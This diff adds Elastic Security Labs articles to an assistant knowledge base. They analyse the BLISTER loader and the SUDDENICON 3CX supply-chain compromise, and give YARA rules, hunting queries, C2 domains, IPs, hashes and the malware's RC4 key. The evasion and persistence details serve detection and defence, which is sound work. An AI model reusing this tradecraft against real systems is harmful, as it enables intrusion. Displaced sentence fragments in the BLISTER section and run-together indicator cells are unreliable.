diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_uncovers_blister_malware_campaign.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_uncovers_blister_malware_campaign.md
new file mode 100644
index 0000000000000..40309170aff43
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_security_uncovers_blister_malware_campaign.md
@@ -0,0 +1,215 @@
+---
+title: "Elastic Security uncovers BLISTER malware campaign"
+slug: "elastic-security-uncovers-blister-malware-campaign"
+date: "2022-08-03"
+description: "Elastic Security has identified active intrusions leveraging the newly identified BLISTER malware loader utilizing valid code-signing certificates to evade detection. We are providing detection guidance for security teams to protect themselves."
+author:
+  - slug: joe-desimone
+  - slug: samir-bousseaden
+image: "blog-security-timeseries-radar-720x420.png"
+category:
+  - slug: attack-pattern
+---
+
+## Key takeaways:
+
+- Elastic Security uncovered a stealthy malware campaign that leverages valid code signing certificates to evade detection
+- A novel malware loader, BLISTER was used to execute second stage malware payloads in-memory and maintain persistence
+- The identified malware samples have very low or no detections on VirusTotal
+- Elastic provided layered prevention coverage from this threat out of the box
+
+> For information on the BLISTER malware loader and campaign observations, check out our blog post and configuration extractor detailing this:
+>
+> - [BLISTER Malware Analysis](https://www.elastic.co/security-labs/blister-loader)
+> - [BLISTER Configuration Extractor](https://www.elastic.co/security-labs/blister-configuration-extractor)
+
+## Overview
+
+The Elastic Security team identified a noteworthy cluster of malicious activity after reviewing our threat prevention telemetry. A valid code signing certificate is used to sign malware to help the attackers remain under the radar of the security community. We also discovered a novel malware loader used in the campaign, which we’ve named BLISTER. The majority of the malware samples observed have very low, or no, detections in
+
+Elastic’s layered approach to preventing attacks protects from this and similar threats.
+
+In one prevented attack, our malicious behavior prevention triggered multiple high-confidence alerts for _Execution via Renamed Signed Binary Proxy_, _Windows Error Manager/Reporting Masquerading_, and _Suspicious PowerShell Execution via Windows Scripts_. Further, our memory threat prevention identified and stopped BLISTER from injecting its embedded payload to target processes.
+
+Finally, we have additional coverage from our open source detection engine rules [
+
+## Details
+
+#### Certificate abuse
+
+A key aspect of this campaign is the use of a valid code signing certificate issued by
+
+We responsibly disclosed the activity to Sectigo so they could take action and revoke the abused certificates. Below shows details about the compromised certificate. We have observed malware signed with this certificate as early as September 15, 2021.
+
+Issuer: _Sectigo Public Code Signing CA R36_Issued to: \_Blist LLC_Serial number: \_2f4a25d52b16eb4c9dfe71ebbd8121bb_Valid from: ‎_Monday, ‎August ‎23, ‎2021 4:00:00 PM_Valid to: ‎_Wednesday, ‎August ‎24, ‎2022 3:59:59 PM_
+
+[VirusTotal](https://www.virustotal.com/). The infection vector and goals of the attackers remain unknown at this time.[1](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_masquerading_werfault.toml)] [[2](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml)]. To ensure coverage for the entire community, we are including YARA rules and IoCs to help defenders identify impacted systems.[Sectigo](https://sectigo.com/ssl-certificates-tls/code-signing). Adversaries can either steal legitimate code-signing certificates or purchase them from a certificate authority directly or through front companies. Executables with valid code signing certificates are often scrutinized to a lesser degree than unsigned executables. Their use allows attackers to remain under the radar and evade detection for a longer period of time.
+
+![](/assets/images/elastic-security-uncovers-blister-malware-campaign/1-digital-signature-information.jpg)
+
+#### BLISTER malware loader
+
+Another interesting aspect of this campaign is what appears to be a novel malware loader with limited detections in VirusTotal. We refer to it as the BLISTER loader. The loader is spliced into legitimate libraries such as [colorui.dll](https://www.virustotal.com/gui/file/bf356c43e4f9fd1fa4e00fe276cedcba4b08905051c2c621276f36ba332bff1d/detection), likely to ensure the majority of the on-disk footprint has known-good code and metadata. The loader can be initially written to disk from simple dropper executables. [One](https://www.virustotal.com/gui/file/ed241c92f9bc969a160da2c4c0b006581fa54f9615646dd46467d24fe5526c7a) such dropper writes a signed BLISTER loader to _%temp%\Framwork\axsssig.dll_ and executes it with _rundll32_. _LaunchColorCpl_ is a common DLL export and entry point name used by BLISTER as seen in the command line parameters:
+
+```
+Rundll32.exe C:\Users\user\AppData\Local\Temp\Framwork\axsssig.dll,LaunchColorCpl
+```
+
+Once executed, BLISTER decodes bootstrapping code stored in the resource section with a simple 4-byte XOR routine shown below:
+
+![](/assets/images/elastic-security-uncovers-blister-malware-campaign/2-bootstrapping-code.jpg)
+
+The bootstrapping code is heavily obfuscated and initially sleeps for 10 minutes. This is likely an attempt to evade sandbox analysis. After the delay, it decrypts the embedded malware payload. We have observed CobaltStrike and BitRat as embedded malware payloads. Once decrypted, the embedded payload is loaded into the current process or injected into a newly spawned _WerFault.exe_ process.
+
+Finally, BLISTER establishes persistence by copying itself to the _C:\ProgramData_ folder, along with a re-named local copy of _rundll32.exe_. A link is created in the current user’s Startup folder to launch the malware at logon as a child of _explorer.exe._
+
+## YARA
+
+We have created a YARA rule to identify this BLISTER activity:
+
+```
+rule Windows_Trojan_Blister{
+    meta:
+        author = “Elastic Security”
+        creation_date = "2021-12-20"
+        last_modified = "2021-12-20"
+        os = "Windows"
+        category_type = "Trojan"
+        family = "Blister"
+        threat_name = "Windows.Trojan.Blister"
+        reference_sample = "0a7778cf6f9a1bd894e89f282f2e40f9d6c9cd4b72be97328e681fe32a1b1a00"
+
+    strings:
+        $a1 = {8D 45 DC 89 5D EC 50 6A 04 8D 45 F0 50 8D 45 EC 50 6A FF FF D7}
+        $a2 = {75 F7 39 4D FC 0F 85 F3 00 00 00 64 A1 30 00 00 00 53 57 89 75}
+condition:
+        any of them
+}
+```
+
+## Defensive recommendations
+
+### Elastic Endpoint Alerts
+
+Elastic [Endpoint Security](https://www.elastic.co/endpoint-security/) provides deep coverage for this threat by stopping the in-memory thread execution and preventing malicious behaviors.
+
+**Memory Threat Detection Alert: Shellcode Injection**
+
+![](/assets/images/elastic-security-uncovers-blister-malware-campaign/Screen_Shot_2021-12-22_at_12.21.14_PM.jpg)
+
+**Malicious Behavior Detection Alert: Execution via Renamed Signed Binary Proxy**
+
+![](/assets/images/elastic-security-uncovers-blister-malware-campaign/4-malicious-behavior-detection-alert.jpg)
+
+## Hunting queries
+
+These queries can be used in Kibana's Security -\\> Timelines -\\> Create new timeline -\\> Correlation query editor. While these queries will identify this intrusion set, they can also identify other events of note that, once investigated, could lead to other malicious activities.
+
+**Proxy Execution via Renamed Rundll32**
+
+Hunt for renamed instances of _rundll32.exe_
+
+```
+process where event.action == "start" and
+process.name != null and
+(process.pe.original_file_name == "RUNDLL32.EXE" and not process.name : "RUNDLL32.EXE")
+```
+
+**Masquerading as WerFault**
+
+Hunt for potential rogue instances of WerFault.exe (Windows Errors Reporting) in an attempt to masquerade as a legitimate system process that is often excluded from behavior-based detection as a known frequent false positive:
+
+```
+process where event.action == "start" and
+  process.executable :
+   ("?:\\Windows\\Syswow64\\WerFault.exe" ,"?:\\Windows\\System32\\WerFault.exe") and
+   /*
+     legit WerFault will have more than one argument in process.command_line
+   */
+  process.args_count == 1
+```
+
+![Evasion via Masquerading as WerFault and Renamed Rundll32](/assets/images/elastic-security-uncovers-blister-malware-campaign/5-evasion-werfault.jpg)
+
+**Persistence via Registry Run Keys / Startup Folder**
+
+Malware creates a new run key for persistence:
+
+```
+registry where registry.data.strings != null and
+ registry.path : (
+  /* Machine Hive */      "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*",
+"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\*",  "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\\*",
+
+ /* Users Hive */
+"HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*",
+"HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\*", "HKEY_USERS\\*\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\\*"
+     )
+```
+
+![Persistence via Run key](/assets/images/elastic-security-uncovers-blister-malware-campaign/6-persistence-via-run-key.jpg)
+
+**Suspicious Startup Shell Folder Modification**
+
+Modify the default Startup value in the registry via COM (dllhost.exe) and then write a shortcut file for persistence in the new modified Startup folder:
+
+```
+sequence by host.id with maxspan=1m
+ [registry where
+  /* Modify User default Startup Folder */
+  registry.path : (
+     "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Common Startup",
+     "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup",
+     "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup",
+     "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup"
+     ) ]
+  /* Write File to Modified Startup Folder */
+    [file where event.type : ("creation", "change") and file.path : "?:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*"]
+```
+
+![Persistence via Modified Startup](/assets/images/elastic-security-uncovers-blister-malware-campaign/7-modified-startup.jpg)
+
+**Elastic Detection Engine Rules**
+
+The following existing public detection rules can also be used to detect some of the employed techniques:
+
+[Potential Windows Error Manager Masquerading](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_masquerading_werfault.toml)
+
+[Windows Defender Exclusions Added via PowerShell](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml)
+
+[Startup or Run Key Registry Modification](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_run_key_and_startup_broad.toml)
+
+[Shortcut File Written or Modified for Persistence](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_startup_folder_file_written_by_suspicious_process.toml)
+
+[Suspicious Startup Shell Folder Modification](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml)
+
+## MITRE ATT&CK
+
+[T1218.011 - Signed Binary Proxy Execution: Rundll32](https://attack.mitre.org/techniques/T1218/011/)
+
+[T1055 - Process Injection](https://attack.mitre.org/techniques/T1055/)
+
+[T1547.001 - Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001/)
+
+[T1036 - Masquerading](https://attack.mitre.org/techniques/T1036/)
+
+## Summary
+
+The BLISTER loader has several tricks which has allowed it to fly under the radar of the security community for months. This includes leveraging valid code signing certificates, infecting legitimate libraries to fool machine learning models, and executing payloads in-memory. However, the depth of protection offered with Elastic Security meant we were still able to identify and stop in-the-wild attacks.
+
+Existing Elastic Security can access these capabilities within the product. If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/free#quick-starts) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals). You can always get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration?elektra=whats-new-elastic-security-7-16-blog).
+
+## Indicators
+
+|
+| |
+| Indicator | Type | Note |
+| --- | --- | --- |
+| F3503970C2B5D57687EC9E31BB232A76B624C838 | SHA1 | Code-signing certificate thumbprint |
+| moduleloader.s3.eu-west-2.amazonaws[.]comdiscountshadesdirect[].com bimelectrical[.]comclippershipintl[.]com | Domain name | Malware c2 |
+| 188.68.221[.]20393.115.18[.]24852.95.148[.]16284.38.183[.]17480.249.145[.]212185.170.213[.]186 | IP Address | Malware c2 |
+| ed6910fd51d6373065a2f1d3580ad645f443bf0badc398aa77185324b0284db8 cb949ebe87c55c0ba6cf0525161e2e6670c1ae186ab83ce46047446e9753a9267b9091c41525f1721b12dcef601117737ea990cee17a8eecf81dcfb25ccb5a8f84a67f191a93ee827c4829498d2cb1d27bdd9e47e136dc6652a5414dab440b74cc31c124fc39025f5c3a410ed4108a56bb7c6e90b5819167a06800d02ef1f0289472d4cb393256a62a466f6601014e5cb04a71f115499c320dc615245c7594d44fe551bcea5e07879ec84a7f1cea1036cfd0a3b03151403542cab6bd8541f8e51a10a07413115c254cb7a5c4f63ff525e64adfe8bb60acef946bb7656b7a2b3d9bccc1862e3e5a6c89524f2d76144d121d0ee95b1b8ba5d0ffcaa23025318a608a414a40419e32282d33af3273ff73a596a7ac8738e9cdca6e7db0e41c1a7658923b2f90749da76b997e1c7870ae3402aba875fdbdd64f79cbeba2f928884129ed241c92f9bc969a160da2c4c0b006581fa54f9615646dd46467d24fe5526c7a294c710f4074b37ade714c83b6b7bf722a46aef61c02ba6543de5d59edc97b60 | sha256 | Signed Droppers |
+| df8142e5cf897af65972041024ebe74c7915df0e18c6364c5fb9b2943426ed1a2d049f7658a8dccd930f7010b32ed1bc9a5cc0f8109b511ca2a77a2104301369696f6274af4b9e8db4727269d43c83c350694bd1ef4bd5ccdc0806b1f014568aa34821b50aadee0dd85c382c43f44dae1e5fef0febf2f7aed6abf3f3e21f79947cd03b30cfeea07b5ea4c8976e6456cb65e09f6b8e7dcc68884379925681b1c481edf3a3b295b0189e54f79387e7df61250cc8eab4f1e8f42eb5042102df8f1f44e5770751679f178f90ef7bd57e8e4ccfb6051767d8e906708c52184bf27f320a7778cf6f9a1bd894e89f282f2e40f9d6c9cd4b72be97328e681fe32a1b1a00a486e836026e184f7d3f30eaa4308e2f0c381c070af1f525118a484a987827c1359ffa33784cb357ddabc42be1dcb9854ddb113fd8d6caf3bf0391380f9d640a863228efa55b54a8d03a87bb602a2e418856e0028ae409357454a6303b128224d0f934fd5d63a1524616bc13b51ce274539a8ead9b072e7f7fe1a14bb8b927a6c0f3b27ae4f7db457a86a38244225cca35aa0960eb6a685ed350e99a36c32b61216cb4f2caeaf59f297f72f7f271b084637e5087d59411ac77ddd3b87e7a90aa00eb2f75822abeb2e222d007bdec464bfbc3934b8be12983cc898b37c6ace08125a0d6a839c4dc708dcdd1ef9395570cc86d54d4725b7daf56964017f66be3c13c7480998ade344b74e956f7d3a3f1a989aaf43446163a62f0a8ed34b0c010d05651e8a8e6f9c63c4c1162efadfcb4cdd9ad634c5e00a5ab03259fcdeaa225acba3a50930e7a144637faf88a98f2990a27532bfd20a93dc160eb2db4fbc17b58fa885e9ea1293552cb45a89e740426fa9c313225ff77ad1980dfea83b6c4a91cbee3210360c5d0939c5d38b7b9f0c232cf9fbf93b46a19e53930a1606bda28a556ca9ea3f7870561ed3c6387daf495404ed3827f212472501d2541d5ccf8b941c61d2ba1e001c137533cd7fb6b38fe71fee489d61dbcfea45c37c5ec1bcf845c17ea84d547e97a030d2b02ac2eaa9763ffb4f96f6c54659533a23e17268aababca09d9cd2f3cfcc06b33eff91d55602cb33a66ab3fd4f540b9212fce5ddae54a6c6f808f9b19e1fab1c1b83dc99386f0ceee8593ddfd461ac047eae812df8733 | sha256 | Unsigned BLISTER Loader DLL |
+| afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2516cac58a6bfec5b9c214b6bba0b724961148199d32fb42c01b12ac31f6a60998ae2c205220c95f0f7e1f67030a9027822cc18e941b669e2a52a5dbb5af74bc9fe7357d48906b68f094a81d19cc0ff93f56cc40454ac5f00e2e2d9c8ccdbc388af555d61becfcf0c13d4bc8ea7ab97dcdc6591f8c6bb892290898d28ebce1c5d96bf7bd5f405d3b4c9a71bcd1060395f28f2466fdb91cafc6e261a31d41eb37af5104d0ead2f178711b1e23db3c16846de7d1a3ac04dbe09bacebb847775d76d8e22cf159345852be585bc5a8e9af476b00bc91cdda98fd6a3244219a90ac9d9d54dfedda0efa36ed445d501845b61ab73c2102786be710ac19f697fc8d4ca5c | sha256 | Signed BLISTER Loader DLL |
+| Launcher V7.3.13.exeGuiFramwork.exeffxivsetup.exePredictor V8.21 - Copy.exePredictor Release v5.9.rarPredictorGUI.exeReadhelper.exedxpo8umrzrr1w6gm.exePers.exerazer.exeAmlidiag.exeModern.exeiuyi.exeCleandevicehelper.exeinstaller.exe | File name | Dropper Names |
+| Holorui.dllColorui.dllPasade.dllAxsssig.dllHelper.CC.dllHeav.dllPasadeis.dllTermmgr.dllTermService.dllrdpencom.dlllibcef.dlltnt.dll | File name | BLISTER DLL Names |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_users_protected_from_suddenicon_supply_chain_attack.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_users_protected_from_suddenicon_supply_chain_attack.md
new file mode 100644
index 0000000000000..b2effc7985dc5
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_users_protected_from_suddenicon_supply_chain_attack.md
@@ -0,0 +1,150 @@
+---
+title: "Elastic users protected from SUDDENICON’s supply chain attack"
+slug: "elastic-users-protected-from-suddenicon-supply-chain-attack"
+date: "2023-05-05"
+subtitle: "Elastic alert telemetry has observed protection events related to the supply chain attacks targeting the 3CXDesktopApp update process."
+description: "Elastic Security Labs is releasing a triage analysis to assist 3CX customers in the initial detection of SUDDENICON, a potential supply-chain compromise affecting 3CX VOIP softphone users."
+author:
+  - slug: daniel-stepanic
+  - slug: remco-sprooten
+  - slug: joe-desimone
+  - slug: samir-bousseaden
+  - slug: devon-kerr
+image: "photo-edited-06@2x.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - ref7957
+  - suddenicon
+---
+
+# Key takeaways
+
+- Elastic users are protected from supply chain attacks targeting the 3CX users
+- How the execution flow operates is actively being investigated by Elastic Security Labs and other research teams
+- Irrespective of the anti-malware technology you are using, shellcode and process injection alerts for 3CX should not be added to exception lists
+
+# Preamble
+
+On March 29, 2023, CrowdStrike reported a potential supply-chain compromise affecting 3CX VOIP softphone users [as detailed in a Reddit post](https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/). Elastic Security Labs continues to monitor telemetry for evidence of threat activity and will provide updates as more evidence becomes available. The earliest period of potentially malicious activity is currently understood to be on or around March 22, 2023 [as reported by Todyl](https://www.todyl.com/blog/post/threat-advisory-3cx-softphone-telephony-campaign).
+
+[3CX states](https://www.3cx.com/company/customers/) it is used by over 600,000 companies and over 12,000,000 users, so Elastic Security Labs is releasing a triage analysis to assist 3CX customers in the initial detection of SUDDENICON, with follow-on malware and intrusion analysis to be released at a later date.
+
+In this informational update, Elastic Security Labs provides the following: - Potential malicious domains associated with malware activity - File hashes for 3CX Windows and MacOS clients which may be impacted - Elastic queries and prebuilt protections which may be relevant to this activity - YARA rules to identify the SUDDENICON malware
+
+# SUDDENICON triage analysis
+
+The 3CXDesktopApp [installer MSI](https://www.virustotal.com/gui/file/aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868) appears to contain malicious code which waits seven days post-installation before downloading additional files from [GitHub](https://github.com/IconStorages/images) and communicating with malicious command-and-control domains. The client application writes `ffmpeg.dll` and `d3dcompiler\_47.dll` to disk, the latter of which contains a payload we refer to as SUDDENICON. Both libraries in our sampling appear to have been backdoored. It should be noted that `ffmpeg.dll` and `d3dcompiler\_47.dll` are both legitimate file names and rules should not be created on them alone.
+
+![ffmpeg.dll referencing the d3dcompiler_47.dll file](/assets/images/elastic-users-protected-from-suddenicon-supply-chain-attack/image1.jpg)
+
+The `ffmpeg.dll` binary extracts SUDDENICON from `d3dcompiler\_47.dll` by seeking the FEEDFACE byte sequence and decrypting using a static RC4 key (`3jB(2bsG#@c7`). The resulting payload is then loaded in memory as the second-stage payload. A shellcode stub prepended to the payload used to map it into memory shares similarities with APPLEJEUS loader stubs, which have been [associated with DPRK](https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-048a). Upon successfully executing, this shellcode stub writes a new file ( `manifest` ) to disk with a timestamp 7 days in the future, used to implement a timer after which the malware connects to the C2 infrastructure.
+
+![ffmpeg.dll loading the d3dcompiler_47.dll file](/assets/images/elastic-users-protected-from-suddenicon-supply-chain-attack/image3.jpg)
+
+C2 domains are retrieved by downloading and base64-decoding the trailing bytes appended to icon files staged in the [IconStorages Github repository](https://github.com/IconStorages) (this repository has been removed by Github). This repo was created by GitHub ID `120072117` on December 8, 2022, and most recently updated on March 16, 2023. After initially connecting to an active C2 server, the malware performs a POST containing a machine identifier. It then downloads and decrypts a new executable.
+
+![SUDDENICON downloading a new executable](/assets/images/elastic-users-protected-from-suddenicon-supply-chain-attack/image5.png)
+
+Initial analysis of the new executable appears to be an information stealer. We’ll release an update once the analysis has been completed.
+
+The CEO of 3CX has [recommended uninstalling the software](https://www.3cx.com/community/threads/3cx-desktopapp-security-alert.119951/); a small number of [community forum](https://www.3cx.com/community/forums) posts outline how security tooling is reacting to potential malware behaviors, and [CrowdStrike](https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/) and [SentinelOne](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/) have published initial information. It appears likely that the threat was able to introduce adversary-created malicious software via update channels, overwriting otherwise benign components of the 3CXDesktopApp. Users may accidentally self-infect, as well.
+
+# Detection logic
+
+## Prevention
+
+- Memory Threat Detection Alert: Shellcode injection
+- [Windows.Trojan.SuddenIcon](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SuddenIcon.yar)
+
+![Memory Threat Detection Alert: Shellcode injection](/assets/images/elastic-users-protected-from-suddenicon-supply-chain-attack/image4.jpg)
+
+## Hunting queries
+
+The events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.
+
+## KQL queries
+
+The following KQL query can be used to identify 3CX-signed software performing name resolution of raw.githubusercontent.com, where malicious applications related to this threat have been staged:
+
+`process.name : "3CXDesktopApp.exe" and dns.question.name : "raw.githubusercontent.com"`
+
+The following KQL query can be used to identify several host-based indicators of this activity:
+
+`dll.hash.sha256  : "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896" or dll.hash.sha256 :  "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"`
+
+## EQL queries
+
+Using the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for similar behaviors.
+
+The following EQL query can be used to profile 3CX software and child software:
+
+`any where process.code_signature.subject_name == "3CX Ltd" or process.parent.code_signature.subject_name == "3CX Ltd"`
+
+The following EQL query can be used to identify 3CX-signed software performing name resolution of raw.githubusercontent.com, where malicious applications related to this threat have been staged:
+
+`network where process.code_signature.subject_name == "3CX Ltd" and dns.question.name == “raw.githubusercontent.com”`
+
+The following EQL query can be used to identify files written by the 3CXDesktopApp client:
+
+`file where event.type == "creation" and (host.os.type == "windows" and file.path : "*:\\Users\\*\\AppData\\Local\\Programs\\C3XDesktopApp\\app\\*" and file.name : ("manifest")) or (host.os.type == "macos" and file.path : "*/Library/Application Support/3CX Desktop App/" and file.name : ("UpdateAgent", ".main_storage", ".session-lock")`
+
+The following EQL query can be used to identify several host-based indicators of this activity:
+
+`sequence by host.name, process.entity_id[process where process.code_signature.subject_name:"3CX Ltd"][library where dll.hash.sha256:"c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02","7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"][network where dns.question.name:"raw.githubusercontent.com"]`
+
+The following EQL query can be used to identify this activity if the DLL is updated:
+
+`library where process.code_signature.subject_name : "3CX Ltd" and not dll.code_signature.trusted == true and not startswith~(dll.name, process.name) and /* DLL loaded from the process.executable directory */ endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))`
+
+## YARA
+
+Elastic Security Labs has released [two YARA signatures](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SuddenIcon.yar) for the malicious shellcode, which we refer to as SUDDENICON.
+
+## Defensive recommendations
+
+Elastic Endgame and Elastic Endpoint customers with shellcode protections enabled in prevention mode blocked the execution of SUDDENICON, though any compromised client software may need to be removed. Due to the delayed shellcode retrieval and injection, 3CXDesktopApp users may not see alerts until the sleep interval passes (approximately 7 days). Customers who are using shellcode protections in detect-only mode should enable prevention to mitigate the risk of infection. Do not create exceptions for these alerts.
+
+![Enabling the Memory threat protection feature in Prevent mode](/assets/images/elastic-users-protected-from-suddenicon-supply-chain-attack/image2.jpg)
+
+# References
+
+The following were referenced throughout the above research: - [https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/](https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/) - [https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/) - [https://www.todyl.com/blog/post/threat-advisory-3cx-softphone-telephony-campaign](https://www.todyl.com/blog/post/threat-advisory-3cx-softphone-telephony-campaign)
+
+# Indicators
+
+## Potentially malicious domains
+
+Bold domains indicate that they were observed in our analysis.
+
+- akamaicontainer[.]com
+- akamaitechcloudservices[.]com
+- `azuredeploystore[.]com`
+- azureonlinecloud[.]com
+- azureonlinestorage[.]com
+- dunamistrd[.]com
+- glcloudservice[.]com
+- journalide[.]org
+- `msedgepackageinfo[.]com`
+- msstorageazure[.]com
+- `msstorageboxes[.]com`
+- `officeaddons[.]com`
+- `officestoragebox[.]com`
+- pbxcloudeservices[.]com
+- pbxphonenetwork[.]com
+- pbxsources[.]com
+- qwepoi123098[.]com
+- sbmsa[.]wiki
+- `sourceslabs[.]com`
+- `visualstudiofactory[.]com`
+- `zacharryblogs[.]com`
+
+# Potentially impacted 3CXDesktopApp versions and hashes:
+
+Client hash: `dde03348075512796241389dfea5560c20a3d2a2eac95c894e7bbed5e85a0acc` OS: Windows Installer hash: `aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868` Installer filename: `3cxdesktopapp-18.12.407.msi`
+
+Client hash: `fad482ded2e25ce9e1dd3d3ecc3227af714bdfbbde04347dbc1b21d6a3670405` OS: Windows Installer hash: `59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983` Installer filename: `3cxdesktopapp-18.12.416.msi`
+
+Client hash: `92005051ae314d61074ed94a52e76b1c3e21e7f0e8c1d1fdd497a006ce45fa61` OS: macOS Installer hash: `5407cda7d3a75e7b1e030b1f33337a56f293578ffa8b3ae19c671051ed314290` Installer filename: `3CXDesktopApp-18.11.1213.dmg`
+
+Client hash: `b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb` OS: macOS Installer hash: `e6bbc33815b9f20b0cf832d7401dd893fbc467c800728b5891336706da0dbcec` Installer filename: `3cxdesktopapp-latest.dmg`
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastics_2022_global_threat_report_a_roadmap_for_navigating_todays_growing_threatscape.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastics_2022_global_threat_report_a_roadmap_for_navigating_todays_growing_threatscape.md
new file mode 100644
index 0000000000000..7d6956354df2c
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastics_2022_global_threat_report_a_roadmap_for_navigating_todays_growing_threatscape.md
@@ -0,0 +1,54 @@
+---
+title: "Elastic’s 2022 Global Threat Report: A roadmap for navigating today’s growing threatscape"
+slug: "elastics-2022-global-threat-report-a-roadmap-for-navigating-todays-growing-threatscape"
+date: "2022-12-08"
+description: "Threat intelligence resources like the 2022 Elastic Global Threat Report are critical to helping teams evaluate their organizational visibility, capabilities, and expertise in identifying and preventing cybersecurity threats."
+author:
+  - slug: mandy-andress
+image: "gtr-blog-image-720x420.jpg"
+category:
+  - slug: reports
+---
+
+Staying up-to-date on the current state of security and understanding the implications of today’s growing threat landscape is critical to my role as CISO at Elastic. Part of this includes closely following the latest security threat reports, highlighting trends, and offering valuable insights into methods bad actors use to compromise environments.
+
+Threat intelligence resources like the [2022 Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) are critical to helping my team evaluate our organization’s visibility, capabilities, and expertise in identifying and preventing cybersecurity threats. It helps us answer questions such as:
+
+- How is our environment impacted by the current and emerging threats identified in this report?
+- Does this new information change our risk profile and impact our risk analysis?
+- What adjustments do we need to make to our controls?
+- Are we lacking visibility in any areas?
+- Do we have the right detections in place?
+- How might these insights affect my team’s workflows?
+
+Elastic’s threat report provides a real-world roadmap to help my team make the connections necessary to strengthen our security posture. It influences our overall program roadmaps, helping us prioritize where we focus our resources, including adjusting our defenses, testing incident response plans, and identifying updates for our security operations center (SOC). And perhaps most importantly, the report underscores our belief that providing open, transparent, and accessible security for all organizations is key to defending ourselves against cybersecurity threats.
+
+## Check your cloud security, and then check it again
+
+Threat reports often reinforce many of the existing trends and phenomena we see within security, but they can also reveal some unexpected insights. While the cloud enables organizations to operate faster and at scale, it also creates security gaps that leave room for potential attacks as threat actors continue shifting their focus to the cloud.
+
+The Elastic Global Threat Report revealed that nearly 40% of all malware infections are on Linux endpoints, further emphasizing the need for better cloud security. With [nine out of the top ten public clouds running on Linux](https://www.redhat.com/en/resources/state-of-linux-public-cloud-solutions-ebook), this statistic is an important reminder to organizations not to rely solely on their cloud provider’s standard configurations for security.
+
+The findings further revealed that approximately 57% of cloud security events were attributed to AWS, followed by 22% for Google Cloud and 21% for Azure, and that 1 out of every 3 (33%) cloud alerts was related to credential access across all cloud service providers.
+
+While the data points to an increased need for organizations to properly secure their cloud environments, it also reinforces our belief that cloud security posture management (CSPM) needs to evolve similarly to endpoint security.
+
